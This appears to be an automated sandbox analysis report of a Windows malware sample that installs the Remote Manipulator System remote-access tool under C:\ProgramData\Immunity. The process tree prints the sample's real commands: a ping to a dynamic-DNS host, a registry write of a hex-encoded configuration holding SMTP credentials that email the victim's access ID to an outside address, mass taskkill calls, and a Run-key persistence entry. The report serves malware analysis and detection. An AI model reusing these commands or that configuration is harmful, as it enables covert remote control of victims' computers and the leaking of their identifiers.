Analysis

  • max time kernel
    146s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    01-11-2020 10:30

General

  • Target

    ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe

  • Size

    4.9MB

  • MD5

    8817ae0956677b821ae053b7fff41968

  • SHA1

    a0e0577c501355b80f7d1240cf9b850598bc0730

  • SHA256

    ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb

  • SHA512

    0d0e7d149d7bf6217b9e169fbcb8a85460f8d20f1868b2ae6f686e2211f6cf6c2fa89831d72d8a34c4135252d5b99d48203cac58490c38411c98e9f0447c9883

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • JavaScript code in executable 3 IoCs
  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 100 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 104 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 443 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe
    "C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Users\Admin\AppData\Local\Temp\is-MPQAC.tmp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-MPQAC.tmp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp" /SL5="$20158,4482184,721408,C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1240
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c ping -n 2 Ping-ip.hldns.ru|find "TTL="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:776
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 2 Ping-ip.hldns.ru
          4⤵
          • Runs ping.exe
          PID:1724
        • C:\Windows\SysWOW64\find.exe
          find "TTL="
          4⤵
            PID:980
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\Immunity\install.cmd""
          3⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1624
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Host\Parameters" /f /v "notification" /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313038223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b43434136343745432d313543392d344239392d424538332d4337434346423645353244337d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393130383c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e534d54502e79616e6465782e72753c2f686f73743e3c706f72743e3538373c2f706f72743e3c757365726e616d653e736368616b75726f784079616e6465782e72753c2f757365726e616d653e3c70617373776f72643e6f4e33396a3138786771536a33654b5057444744704b76646a6f38384d66536d3c2f70617373776f72643e3c66726f6d5f656d61696c3e736368616b75726f784079616e6465782e72753c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e706175373838377061754079616e6465782e72753c2f656d61696c3e3c7375626a6563743e496e7465726e65742d494420d181d0b3d0b5d0bdd0b5d180d0b8d180d0bed0b2d0b0d0bd3a20254944253c2f7375626a6563743e3c746578743e2c2c2671756f743b49443a20254944252671756f743b2c2671756f743bd0a1d0b5d180d0b2d0b5d1803a2025534552564552252671756f743b2c2c2671756f743bd098d0bcd18f20d0bfd0bed0bbd18cd0b7d0bed0b2d0b0d182d0b5d0bbd18f3a2025555345524e414d45252671756f743b2c2671756f743bd09dd0b0d0b7d0b2d0b0d0bdd0b8d0b520d0bad0bed0bcd0bfd18cd18ed182d0b5d180d0b03a2025434f4d504e414d45252671756f743b2c2671756f743bd09fd0bed0bbd18cd0b7d0bed0b2d0b0d182d0b5d0bbd18c20d0bfd180d0b5d0b4d181d182d0b0d0b2d0b8d0bbd181d18f20d0bad0b0d0ba3a202553454c464944252671756f743b2c3c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a
            4⤵
              PID:1520
            • C:\Windows\SysWOW64\timeout.exe
              TIMEOUT /T 3
              4⤵
              • Delays execution with timeout.exe
              PID:1124
            • C:\ProgramData\Immunity\rutserv.exe
              "C:\ProgramData\Immunity\rutserv.exe"
              4⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:324
              • C:\ProgramData\Immunity\rutserv.exe
                C:\ProgramData\Immunity\rutserv.exe -second
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:328
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1204
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1900
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1620
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1636
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1700
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1740
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1484
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1896
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1644
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:980
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:432
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1352
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1776
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:404
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:308
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1716
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1900
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1620
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1808
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1156
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:324
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:756
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1012
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1880
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:512
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1292
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:920
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1864
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1724
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:980
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:916
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1516
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1492
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1756
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1892
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:976
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1752
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1532
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1800
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:432
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:928
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:808
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1964
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1204
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1552
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1716
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1760
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1808
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:848
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:980
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:916
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1516
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1276
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:924
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:308
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:964
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1696
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1620
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:972
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:432
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1708
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1872
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
                PID:1028
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im "rundll32.exe"
                4⤵
                  PID:1068
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im "rundll32.exe"
                  4⤵
                  • Kills process with taskkill
                  PID:1320
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im "rundll32.exe"
                  4⤵
                  • Kills process with taskkill
                  PID:1496
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im "rundll32.exe"
                  4⤵
                    PID:1864
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:1636
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:1960
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:1500
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:916
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                      PID:1516
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im "rundll32.exe"
                      4⤵
                      • Kills process with taskkill
                      PID:1740
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im "rundll32.exe"
                      4⤵
                        PID:924
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im "rundll32.exe"
                        4⤵
                          PID:976
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im "rundll32.exe"
                          4⤵
                            PID:1752
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im "rundll32.exe"
                            4⤵
                              PID:1532
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im "rundll32.exe"
                              4⤵
                              • Kills process with taskkill
                              PID:1200
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im "rundll32.exe"
                              4⤵
                                PID:324
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im "rundll32.exe"
                                4⤵
                                • Kills process with taskkill
                                PID:1096
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im "rundll32.exe"
                                4⤵
                                • Kills process with taskkill
                                PID:832
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im "rundll32.exe"
                                4⤵
                                  PID:1880
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /f /im "rundll32.exe"
                                  4⤵
                                    PID:1136
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1328
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1320
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1772
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1808
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:848
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:980
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1548
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:816
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1492
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1740
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:924
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                      PID:976
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /f /im "rundll32.exe"
                                      4⤵
                                      • Kills process with taskkill
                                      PID:948
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /f /im "rundll32.exe"
                                      4⤵
                                      • Kills process with taskkill
                                      PID:1620
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /f /im "rundll32.exe"
                                      4⤵
                                        PID:972
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im "rundll32.exe"
                                        4⤵
                                        • Kills process with taskkill
                                        PID:432
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im "rundll32.exe"
                                        4⤵
                                        • Kills process with taskkill
                                        PID:340
                                      • C:\Windows\SysWOW64\timeout.exe
                                        TIMEOUT /T 9
                                        4⤵
                                        • Delays execution with timeout.exe
                                        PID:1872
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "nots" /t REG_SZ /d "C:\ProgramData\Immunity\rutserv.exe"
                                        4⤵
                                        • Adds Run key to start application
                                        PID:1516

                                Network

                                MITRE ATT&CK Matrix ATT&CK v6

                                Persistence

                                Registry Run Keys / Startup Folder

                                1
                                T1060

                                Defense Evasion

                                Modify Registry

                                1
                                T1112

                                Discovery

                                Query Registry

                                1
                                T1012

                                System Information Discovery

                                1
                                T1082

                                Remote System Discovery

                                1
                                T1018

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\ProgramData\Immunity\install.cmd
                                  MD5

                                  9bce4c0e8b94fc7f45a7196ad7fd482a

                                  SHA1

                                  7fae1988a03fd1c48b7c780b281ca4397f5784ef

                                  SHA256

                                  d1da413730dbc49266bf2d518cc123e57a5e402858730194aee6ed85495abeca

                                  SHA512

                                  9469aa12502f6689b20c163ee9123597cd1efc194e4ceb6948cc87d027c1a296a24ae0d11c65aa9306a4d822298a837d1665a849fb33e815a345903c05f17db6

                                • C:\ProgramData\Immunity\libeay32.dll
                                  MD5

                                  4cb2e1b9294ddae1bf7dcaaf42b365d1

                                  SHA1

                                  a225f53a8403d9b73d77bcbb075194520cce5a14

                                  SHA256

                                  a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884

                                  SHA512

                                  46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

                                • C:\ProgramData\Immunity\rfusclient.exe
                                  MD5

                                  5c268ca919854fc22d85f916d102ee7f

                                  SHA1

                                  0957cf86e0334673eb45945985b5c033b412be0e

                                  SHA256

                                  1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56

                                  SHA512

                                  76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

                                • C:\ProgramData\Immunity\rutserv.exe
                                  MD5

                                  5c19fe652cb3e0f7e03acfabc4cd6ab7

                                  SHA1

                                  912542c52a167726f2b19b5d201fb9af902dc6b1

                                  SHA256

                                  6dda990d8073fee71cedeabd622f6d7a9be6fb2e696bda71e7b709f1c08f5e36

                                  SHA512

                                  bf362405c193632ee0f9d39ac065003617002318dd558d31d45ab0230bd3dcc96535a7125098abcb05f7c56349ed63f5ec908427bf439bca49278d7f34630cea

                                • C:\ProgramData\Immunity\rutserv.exe
                                  MD5

                                  5c19fe652cb3e0f7e03acfabc4cd6ab7

                                  SHA1

                                  912542c52a167726f2b19b5d201fb9af902dc6b1

                                  SHA256

                                  6dda990d8073fee71cedeabd622f6d7a9be6fb2e696bda71e7b709f1c08f5e36

                                  SHA512

                                  bf362405c193632ee0f9d39ac065003617002318dd558d31d45ab0230bd3dcc96535a7125098abcb05f7c56349ed63f5ec908427bf439bca49278d7f34630cea

                                • C:\ProgramData\Immunity\rutserv.exe
                                  MD5

                                  5c19fe652cb3e0f7e03acfabc4cd6ab7

                                  SHA1

                                  912542c52a167726f2b19b5d201fb9af902dc6b1

                                  SHA256

                                  6dda990d8073fee71cedeabd622f6d7a9be6fb2e696bda71e7b709f1c08f5e36

                                  SHA512

                                  bf362405c193632ee0f9d39ac065003617002318dd558d31d45ab0230bd3dcc96535a7125098abcb05f7c56349ed63f5ec908427bf439bca49278d7f34630cea

                                • C:\ProgramData\Immunity\settings.dat
                                  MD5

                                  4a818942b0236338849525c3ee54c7a5

                                  SHA1

                                  603afea5aaea30160b514223772993d7df5d8127

                                  SHA256

                                  2fc3795e8aee256d73939140b401b7521d80b0ae6d66ca4e0d98b44ffeba2b30

                                  SHA512

                                  7442e9273baa257567923e1de0547981facc67a5f6df19de4e3245fa160ecf95233804caf5783a9e4bed16b8dcfb25d11fbee61a0c21afed91243e29e7c6be4a

                                • C:\ProgramData\Immunity\ssleay32.dll
                                  MD5

                                  5c268ca919854fc22d85f916d102ee7f

                                  SHA1

                                  0957cf86e0334673eb45945985b5c033b412be0e

                                  SHA256

                                  1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56

                                  SHA512

                                  76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

                                • C:\Users\Admin\AppData\Local\Temp\is-MPQAC.tmp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp
                                  MD5

                                  84db4b4205f705da71471dc6ecc061f5

                                  SHA1

                                  b90bac8c13a1553d58feef95a2c41c64118b29cf

                                  SHA256

                                  647983ebde53e0501ff1af8ef6190dfeea5ccc64caf7dce808f1e3d98fb66a3c

                                  SHA512

                                  c5803b63d33bb409433b496b83ca2a7359b4b1835815386206283b3af5c54d7d1cb9e80244a888638c7703c4bf54e1b2c11be6836f20b9fea157ab92bfbf365a

                                • \ProgramData\Immunity\libeay32.dll
                                  MD5

                                  4cb2e1b9294ddae1bf7dcaaf42b365d1

                                  SHA1

                                  a225f53a8403d9b73d77bcbb075194520cce5a14

                                  SHA256

                                  a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884

                                  SHA512

                                  46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

                                • \ProgramData\Immunity\libeay32.dll
                                  MD5

                                  4cb2e1b9294ddae1bf7dcaaf42b365d1

                                  SHA1

                                  a225f53a8403d9b73d77bcbb075194520cce5a14

                                  SHA256

                                  a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884

                                  SHA512

                                  46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

                                • \ProgramData\Immunity\rutserv.exe
                                  MD5

                                  5c19fe652cb3e0f7e03acfabc4cd6ab7

                                  SHA1

                                  912542c52a167726f2b19b5d201fb9af902dc6b1

                                  SHA256

